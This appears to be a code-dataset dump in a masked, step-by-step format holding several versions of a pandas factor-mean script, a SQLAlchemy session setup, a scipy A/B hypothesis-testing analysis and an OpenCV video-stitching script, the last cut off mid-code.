"step-4": "import pandas as pd\nimport numpy as np\nimport sys\nif len(sys.argv) <= 3:\n print('Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>')\n print('ex: best-mean.py testdata.csv nicdrop 95000')\n print('<rv> is response variable')\n exit()\ntarget_to_beat = int(sys.argv[3])\nrv = sys.argv[2].split(',')\ndata = pd.read_csv(sys.argv[1], header=[0, 1])\nresponse_var = data[[rv[0], 'factors']]\nresponse_var.columns = response_var.columns.get_level_values(1)\nprint('Re-run factor means')\nprint(response_var.groupby('code')[rv[1]].mean())\nprint('Lowest observed sample mean (target to beat)')\nprint(response_var.groupby('code')[rv[1]].mean().min())\ncandidiate_factors_index = response_var.groupby('code')[rv[1]].mean(\n ).index.array.to_numpy()\nimproved_factors_bools = (response_var.groupby('code')[rv[1]].mean() <\n target_to_beat).to_numpy()\nall = ''\ni = 0\nfor y in candidiate_factors_index:\n if improved_factors_bools[i]:\n all = all + y + ','\n i = i + 1\nprint('Effects')\nif len(all) == 0:\n print('NONE')\n exit()\nprint(all.rstrip(','))\n",
"step-5": "import pandas as pd\nimport numpy as np\nimport sys\n\n#Best Mean Test\nif len(sys.argv) <= 3:\n\tprint(\"Not enough args usage: anova.py <*.csv> <rv1,rv2> <target to beat>\")\n\tprint(\"ex: best-mean.py testdata.csv nicdrop 95000\")\n\tprint(\"<rv> is response variable\")\n\texit()\n\ntarget_to_beat = int(sys.argv[3]) #factors\nrv = sys.argv[2].split(',')\n\ndata = pd.read_csv(sys.argv[1], header=[0,1])\nresponse_var = data[[rv[0],'factors']]\nresponse_var.columns = response_var.columns.get_level_values(1)\n\nprint(\"Re-run factor means\")\nprint(response_var.groupby('code')[rv[1]].mean())\n\nprint(\"Lowest observed sample mean (target to beat)\")\nprint(response_var.groupby('code')[rv[1]].mean().min())\n\n#print factors still remaining as viable\ncandidiate_factors_index = response_var.groupby('code')[rv[1]].mean().index.array.to_numpy() #all factors from csv\nimproved_factors_bools = (response_var.groupby('code')[rv[1]].mean() < target_to_beat).to_numpy() #boolean series\nall = \"\"\ni=0\nfor y in candidiate_factors_index:\n\tif improved_factors_bools[i]:\n\t\tall = all + y + \",\"\n\ti=i+1\nprint(\"Effects\")\nif len(all) == 0:\n\tprint(\"NONE\")\n\texit()\nprint(all.rstrip(','))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
engine = create_engine('sqlite:///app/databases/fays-web-dev.db',
connect_args={'check_same_thread': False})
Session = sessionmaker(bind=engine)
session = Session()
Base = declarative_base()
<|reserved_special_token_1|>
from sqlalchemy import create_engine, Column, Integer, Float, String, Text, DateTime, Boolean, ForeignKey
from sqlalchemy.orm import sessionmaker, relationship
from sqlalchemy.ext.declarative import declarative_base
from flask_sqlalchemy import SQLAlchemy
engine = create_engine('sqlite:///app/databases/fays-web-dev.db',
connect_args={'check_same_thread': False})
Session = sessionmaker(bind=engine)
session = Session()
Base = declarative_base()
<|reserved_special_token_1|>
from sqlalchemy import create_engine, Column, Integer, Float, \
String, Text, DateTime, Boolean, ForeignKey
from sqlalchemy.orm import sessionmaker, relationship
from sqlalchemy.ext.declarative import declarative_base
from flask_sqlalchemy import SQLAlchemy
engine = create_engine('sqlite:///app/databases/fays-web-dev.db', connect_args={'check_same_thread':False})
Session = sessionmaker(bind=engine)
session = Session()
Base = declarative_base()
|
flexible
|
{
"blob_id": "3d2b8730953e9c2801eebc23b6fb56a1b5a55e3c",
"index": 6156,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nengine = create_engine('sqlite:///app/databases/fays-web-dev.db',\n connect_args={'check_same_thread': False})\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n",
"step-3": "from sqlalchemy import create_engine, Column, Integer, Float, String, Text, DateTime, Boolean, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom flask_sqlalchemy import SQLAlchemy\nengine = create_engine('sqlite:///app/databases/fays-web-dev.db',\n connect_args={'check_same_thread': False})\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n",
"step-4": "from sqlalchemy import create_engine, Column, Integer, Float, \\\n String, Text, DateTime, Boolean, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom flask_sqlalchemy import SQLAlchemy\n\nengine = create_engine('sqlite:///app/databases/fays-web-dev.db', connect_args={'check_same_thread':False})\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95
):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)
].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (
dataframe[col] < low_limit)].shape[0]
print(col, ' : ', number_of_outliers, 'outliers')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
df_test.head()
df_control.head()
df_control.info()
df_test.info()
df_test.shape
df_control.shape
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95
):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)
].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (
dataframe[col] < low_limit)].shape[0]
print(col, ' : ', number_of_outliers, 'outliers')
for var in df_control:
print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')
for var in df_test:
print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')
df_control['Purchase'].mean()
df_test['Purchase'].mean()
<|reserved_special_token_0|>
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
<|reserved_special_token_0|>
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
<|reserved_special_token_0|>
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
<|reserved_special_token_0|>
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
df_test = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=
'Test Group')
df_control = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=
'Control Group')
df_test.head()
df_control.head()
df_control.info()
df_test.info()
df_test.shape
df_control.shape
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95
):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)
].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (
dataframe[col] < low_limit)].shape[0]
print(col, ' : ', number_of_outliers, 'outliers')
for var in df_control:
print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')
for var in df_test:
print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')
df_control['Purchase'].mean()
df_test['Purchase'].mean()
group_a = df_control['Purchase']
group_b = df_test['Purchase']
test_statistics, pvalue = shapiro(group_a)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = shapiro(group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = stats.levene(group_a, group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
<|reserved_special_token_1|>
import pandas as pd
from scipy.stats import shapiro
import scipy.stats as stats
df_test = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=
'Test Group')
df_control = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=
'Control Group')
df_test.head()
df_control.head()
df_control.info()
df_test.info()
df_test.shape
df_control.shape
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95
):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)
].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (
dataframe[col] < low_limit)].shape[0]
print(col, ' : ', number_of_outliers, 'outliers')
for var in df_control:
print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')
for var in df_test:
print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')
df_control['Purchase'].mean()
df_test['Purchase'].mean()
group_a = df_control['Purchase']
group_b = df_test['Purchase']
test_statistics, pvalue = shapiro(group_a)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = shapiro(group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = stats.levene(group_a, group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
test_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
<|reserved_special_token_1|>
import pandas as pd
from scipy.stats import shapiro
import scipy.stats as stats
df_test = pd.read_excel("datasets/ab_testing_data.xlsx", sheet_name="Test Group")
df_control = pd.read_excel("datasets/ab_testing_data.xlsx", sheet_name="Control Group")
df_test.head()
df_control.head()
df_control.info()
df_test.info()
df_test.shape
df_control.shape
# Setting threshold value for outliers
def outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95):
quantile_one = dataframe[variable].quantile(low_quantile)
quantile_three = dataframe[variable].quantile(up_quantile)
interquantile_range = quantile_three - quantile_one
up_limit = quantile_three + 1.5 * interquantile_range
low_limit = quantile_one - 1.5 * interquantile_range
return low_limit, up_limit
# Checks for any outliers in the variable.
def has_outliers(dataframe, numeric_columns):
for col in numeric_columns:
low_limit, up_limit = outlier_thresholds(dataframe, col)
if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)].any(axis=None):
number_of_outliers = dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)].shape[0]
print(col, " : ", number_of_outliers, "outliers")
for var in df_control:
print(var, "has ", has_outliers(df_control, [var]), "Outliers")
for var in df_test:
print(var, "has ", has_outliers(df_test, [var]), "Outliers")
# How would you describe the hypothesis of the A / B test?
# H0 : There is no statistical difference between the control and test groups in terms of average number of purchases.
# H1 : There is a statistical difference between the control and test groups in terms of the average number of purchases.
df_control["Purchase"].mean()
df_test["Purchase"].mean()
group_a = df_control["Purchase"]
group_b = df_test["Purchase"]
# 1- Assumption Check
# 1.1 - Normality Assumption
test_statistics, pvalue = shapiro(group_a)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
# If p-value <0.05 HO rejected.
# If p-value is not <0.05 H0 CAN NOT be rejected.
# group_a is distributed normally.
test_statistics, pvalue = shapiro(group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
# If p-value <0.05 HO rejected.
# If p-value is not <0.05 H0 CAN NOT be rejected.
# group_b is distributed normally.
# 1.2 - Variance Homogeneity Assumption
# H0: Variances Are Homogeneous
# H1: Variances Are Not Homogeneous
test_statistics, pvalue = stats.levene(group_a, group_b)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
pvalue < 0.05
# If p-value <0.05 HO rejected.
# If p-value is not <0.05 H0 CAN NOT be rejected.
# Variance homogeneity provided.
# HO: there is no statistical difference between the control and test groups in terms of average number of purchases.
# H1: there is a statistical difference between the control and test groups in terms of average number of purchases
# 1.1 Independent two-sample t-test if assumptions are provided (parametric test)
test_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)
print('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))
# Can we make statistically significant results?
# There is no statistically significant difference between the control group and test groups.
# The two groups are alike.
# Which test did you use? Why is that?
# We used the two-sample t-test (parametric test) since both assumptions are satisfied
# What is your advice to the customer?
# There is no statistical difference between average bidding and maximum bidding
# It can be preferred with a low cost per click.
# We can evaluate the differences in interaction gain and conversion rates and determine which method is more profitable.
# The test can be extended for 1 month.
# The number of observations can be increased.
|
flexible
|
{
"blob_id": "9e01ba8c489791ec35b86dffe12d0cedb5f09004",
"index": 3919,
"step-1": "<mask token>\n\n\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95\n ):\n quantile_one = dataframe[variable].quantile(low_quantile)\n quantile_three = dataframe[variable].quantile(up_quantile)\n interquantile_range = quantile_three - quantile_one\n up_limit = quantile_three + 1.5 * interquantile_range\n low_limit = quantile_one - 1.5 * interquantile_range\n return low_limit, up_limit\n\n\ndef has_outliers(dataframe, numeric_columns):\n for col in numeric_columns:\n low_limit, up_limit = outlier_thresholds(dataframe, col)\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)\n ].any(axis=None):\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (\n dataframe[col] < low_limit)].shape[0]\n print(col, ' : ', number_of_outliers, 'outliers')\n\n\n<mask token>\n",
"step-2": "<mask token>\ndf_test.head()\ndf_control.head()\ndf_control.info()\ndf_test.info()\ndf_test.shape\ndf_control.shape\n\n\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95\n ):\n quantile_one = dataframe[variable].quantile(low_quantile)\n quantile_three = dataframe[variable].quantile(up_quantile)\n interquantile_range = quantile_three - quantile_one\n up_limit = quantile_three + 1.5 * interquantile_range\n low_limit = quantile_one - 1.5 * interquantile_range\n return low_limit, up_limit\n\n\ndef has_outliers(dataframe, numeric_columns):\n for col in numeric_columns:\n low_limit, up_limit = outlier_thresholds(dataframe, col)\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)\n ].any(axis=None):\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (\n dataframe[col] < low_limit)].shape[0]\n print(col, ' : ', number_of_outliers, 'outliers')\n\n\nfor var in df_control:\n print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')\nfor var in df_test:\n print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')\ndf_control['Purchase'].mean()\ndf_test['Purchase'].mean()\n<mask token>\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\n<mask token>\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\n<mask token>\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\n<mask token>\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\n",
"step-3": "<mask token>\ndf_test = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=\n 'Test Group')\ndf_control = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=\n 'Control Group')\ndf_test.head()\ndf_control.head()\ndf_control.info()\ndf_test.info()\ndf_test.shape\ndf_control.shape\n\n\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95\n ):\n quantile_one = dataframe[variable].quantile(low_quantile)\n quantile_three = dataframe[variable].quantile(up_quantile)\n interquantile_range = quantile_three - quantile_one\n up_limit = quantile_three + 1.5 * interquantile_range\n low_limit = quantile_one - 1.5 * interquantile_range\n return low_limit, up_limit\n\n\ndef has_outliers(dataframe, numeric_columns):\n for col in numeric_columns:\n low_limit, up_limit = outlier_thresholds(dataframe, col)\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)\n ].any(axis=None):\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (\n dataframe[col] < low_limit)].shape[0]\n print(col, ' : ', number_of_outliers, 'outliers')\n\n\nfor var in df_control:\n print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')\nfor var in df_test:\n print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')\ndf_control['Purchase'].mean()\ndf_test['Purchase'].mean()\ngroup_a = df_control['Purchase']\ngroup_b = df_test['Purchase']\ntest_statistics, pvalue = shapiro(group_a)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = shapiro(group_b)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = stats.levene(group_a, group_b)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\n",
"step-4": "import pandas as pd\nfrom scipy.stats import shapiro\nimport scipy.stats as stats\ndf_test = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=\n 'Test Group')\ndf_control = pd.read_excel('datasets/ab_testing_data.xlsx', sheet_name=\n 'Control Group')\ndf_test.head()\ndf_control.head()\ndf_control.info()\ndf_test.info()\ndf_test.shape\ndf_control.shape\n\n\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95\n ):\n quantile_one = dataframe[variable].quantile(low_quantile)\n quantile_three = dataframe[variable].quantile(up_quantile)\n interquantile_range = quantile_three - quantile_one\n up_limit = quantile_three + 1.5 * interquantile_range\n low_limit = quantile_one - 1.5 * interquantile_range\n return low_limit, up_limit\n\n\ndef has_outliers(dataframe, numeric_columns):\n for col in numeric_columns:\n low_limit, up_limit = outlier_thresholds(dataframe, col)\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)\n ].any(axis=None):\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (\n dataframe[col] < low_limit)].shape[0]\n print(col, ' : ', number_of_outliers, 'outliers')\n\n\nfor var in df_control:\n print(var, 'has ', has_outliers(df_control, [var]), 'Outliers')\nfor var in df_test:\n print(var, 'has ', has_outliers(df_test, [var]), 'Outliers')\ndf_control['Purchase'].mean()\ndf_test['Purchase'].mean()\ngroup_a = df_control['Purchase']\ngroup_b = df_test['Purchase']\ntest_statistics, pvalue = shapiro(group_a)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = shapiro(group_b)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = stats.levene(group_a, group_b)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\npvalue < 0.05\ntest_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\n",
"step-5": "import pandas as pd\r\nfrom scipy.stats import shapiro\r\nimport scipy.stats as stats\r\n\r\ndf_test = pd.read_excel(\"datasets/ab_testing_data.xlsx\", sheet_name=\"Test Group\")\r\ndf_control = pd.read_excel(\"datasets/ab_testing_data.xlsx\", sheet_name=\"Control Group\")\r\n\r\ndf_test.head()\r\ndf_control.head()\r\n\r\ndf_control.info()\r\ndf_test.info()\r\n\r\ndf_test.shape\r\ndf_control.shape\r\n\r\n\r\n# Setting threshold value for outliers\r\ndef outlier_thresholds(dataframe, variable, low_quantile=0.05, up_quantile=0.95):\r\n quantile_one = dataframe[variable].quantile(low_quantile)\r\n quantile_three = dataframe[variable].quantile(up_quantile)\r\n interquantile_range = quantile_three - quantile_one\r\n up_limit = quantile_three + 1.5 * interquantile_range\r\n low_limit = quantile_one - 1.5 * interquantile_range\r\n return low_limit, up_limit\r\n\r\n\r\n# Checks for any outliers in the variable.\r\ndef has_outliers(dataframe, numeric_columns):\r\n for col in numeric_columns:\r\n low_limit, up_limit = outlier_thresholds(dataframe, col)\r\n if dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)].any(axis=None):\r\n number_of_outliers = dataframe[(dataframe[col] > up_limit) | (dataframe[col] < low_limit)].shape[0]\r\n print(col, \" : \", number_of_outliers, \"outliers\")\r\n\r\n\r\nfor var in df_control:\r\n print(var, \"has \", has_outliers(df_control, [var]), \"Outliers\")\r\n\r\nfor var in df_test:\r\n print(var, \"has \", has_outliers(df_test, [var]), \"Outliers\")\r\n\r\n# How would you describe the hypothesis of the A / B test?\r\n\r\n# H0 : There is no statistical difference between the control and test groups in terms of average number of purchases.\r\n# H1 : There is a statistical difference between the control and test groups in terms of the average number of purchases.\r\n\r\n\r\ndf_control[\"Purchase\"].mean()\r\ndf_test[\"Purchase\"].mean()\r\n\r\ngroup_a = df_control[\"Purchase\"]\r\ngroup_b = df_test[\"Purchase\"]\r\n\r\n# 1- Assumption Check\r\n\r\n# 1.1 - Normality Assumption\r\n\r\ntest_statistics, pvalue = shapiro(group_a)\r\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\r\n\r\npvalue < 0.05\r\n\r\n# If p-value <0.05 HO rejected.\r\n# If p-value is not <0.05 H0 CAN NOT be rejected.\r\n# group_a is distributed normally.\r\n\r\ntest_statistics, pvalue = shapiro(group_b)\r\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\r\n\r\npvalue < 0.05\r\n\r\n# If p-value <0.05 HO rejected.\r\n# If p-value is not <0.05 H0 CAN NOT be rejected.\r\n# group_b is distributed normally.\r\n\r\n# 1.2 - Variance Homogeneity Assumption\r\n\r\n# H0: Variances Are Homogeneous\r\n# H1: Variances Are Not Homogeneous\r\n\r\ntest_statistics, pvalue = stats.levene(group_a, group_b)\r\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\r\n\r\npvalue < 0.05\r\n\r\n# If p-value <0.05 HO rejected.\r\n# If p-value is not <0.05 H0 CAN NOT be rejected.\r\n# Variance homogeneity provided.\r\n\r\n# HO: there is no statistical difference between the control and test groups in terms of average number of purchases.\r\n# H1: there is a statistical difference between the control and test groups in terms of average number of purchases\r\n\r\n# 1.1 Independent two-sample t-test if assumptions are provided (parametric test)\r\ntest_statistics, pvalue = stats.ttest_ind(group_a, group_b, equal_var=True)\r\nprint('Test Statistics = %.4f, p-value = %.4f' % (test_statistics, pvalue))\r\n\r\n# Can we make statistically significant results?\r\n\r\n# There is no statistically significant difference between the control group and test groups.\r\n# The two groups are alike.\r\n\r\n# Which test did you use? Why is that?\r\n\r\n# We used the two-sample t-test (parametric test) since both assumptions are satisfied\r\n\r\n# What is your advice to the customer?\r\n# There is no statistical difference between average bidding and maximum bidding\r\n# It can be preferred with a low cost per click.\r\n# We can evaluate the differences in interaction gain and conversion rates and determine which method is more profitable.\r\n# The test can be extended for 1 month.\r\n# The number of observations can be increased.\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import cv2
import numpy as np
import os
from tqdm import tqdm
DIR = '/home/nghiatruong/Desktop'
INPUT_1 = os.path.join(DIR, 'GOPR1806.MP4')
INPUT_2 = os.path.join(DIR, '20190715_180940.mp4')
INPUT_3 = os.path.join(DIR, '20190715_181200.mp4')
RIGHT_SYNC_1 = 1965
LEFT_SYNC_1 = 1700
RIGHT_SYNC_2 = 5765
LEFT_SYNC_2 = 1282
def add_frame_id(video, output_dir):
reader = cv2.VideoCapture(video)
if not reader.isOpened():
return -1
os.makedirs(output_dir, exist_ok=True)
frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))
for frame_id in tqdm(range(frame_count)):
has_frame, frame = reader.read()
if not has_frame:
break
cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)
reader.release()
return 0
def get_meta(video):
reader = cv2.VideoCapture(video)
if not reader.isOpened():
return None, None, None
width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))
frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))
return width, height, frame_count
w1, h1, fc1 = get_meta(INPUT_1)
h2, w2, fc2 = get_meta(INPUT_2)
ratio = h1 / h2
w2 = int(w2*ratio)+1
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(os.path.join(DIR, 'output.avi'), fourcc, 29.97, (w1+w2+10, h1))
border = np.zeros((h1, 10, 3), dtype='uint8')
filler = np.zeros((h1, w2, 3), dtype='uint8')
reader1 = cv2.VideoCapture(INPUT_1)
reader2 = cv2.VideoCapture(INPUT_2)
reader3 = cv2.VideoCapture(INPUT_3)
last_shape = (h1, w1+w2+10, 3)
for fid in tqdm(range(fc2+RIGHT_SYNC_1-LEFT_SYNC_1)):
_, right_frame = reader1.read()
if fid < RIGHT_SYNC_1-LEFT_SYNC_1:
left_frame = filler
else:
_, left_frame = reader2.read()
left_frame = cv2.transpose(left_frame)
left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)
left_frame = cv2.flip(left_frame, 1)
new_frame = np.concatenate([left_frame, border, right_frame], axis=1)
# cv2.imshow('out', new_frame)
writer.write(new_frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
for fid in tqdm(range(fc2+RIGHT_SYNC_1-LEFT_SYNC_1, RIGHT_SYNC_2-LEFT_SYNC_2)):
_, right_frame = reader1.read()
new_frame = np.concatenate([filler, border, right_frame], axis=1)
# cv2.imshow('out', new_frame)
writer.write(new_frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
for fid in tqdm(range(RIGHT_SYNC_2-LEFT_SYNC_2, fc1)):
r1, right_frame = reader1.read()
if not r1:
break
r3, left_frame = reader3.read()
if not r3:
left_frame = filler
else:
left_frame = cv2.transpose(left_frame)
left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)
left_frame = cv2.flip(left_frame, 1)
new_frame = np.concatenate([left_frame, border, right_frame], axis=1)
# cv2.imshow('out', new_frame)
writer.write(new_frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
reader1.release()
reader2.release()
writer.release()
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "f8f538773693b9d9530775094d9948626247a3bb",
"index": 6950,
"step-1": "<mask token>\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef add_frame_id(video, output_dir):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return -1\n os.makedirs(output_dir, exist_ok=True)\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n for frame_id in tqdm(range(frame_count)):\n has_frame, frame = reader.read()\n if not has_frame:\n break\n cv2.imwrite(os.path.join(output_dir, f'{frame_id}.jpg'), frame)\n reader.release()\n return 0\n\n\ndef get_meta(video):\n reader = cv2.VideoCapture(video)\n if not reader.isOpened():\n return None, None, None\n width = int(reader.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(reader.get(cv2.CAP_PROP_FRAME_HEIGHT))\n frame_count = int(reader.get(cv2.CAP_PROP_FRAME_COUNT))\n return width, height, frame_count\n\n\n<mask token>\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1)):\n _, right_frame = reader1.read()\n if fid < RIGHT_SYNC_1 - LEFT_SYNC_1:\n left_frame = filler\n else:\n _, left_frame = reader2.read()\n left_frame = cv2.transpose(left_frame)\n left_frame = cv2.resize(left_frame, None, fx=ratio, fy=ratio)\n left_frame = cv2.flip(left_frame, 1)\n new_frame = np.concatenate([left_frame, border, right_frame], axis=1)\n writer.write(new_frame)\nfor fid in tqdm(range(fc2 + RIGHT_SYNC_1 - LEFT_SYNC_1, 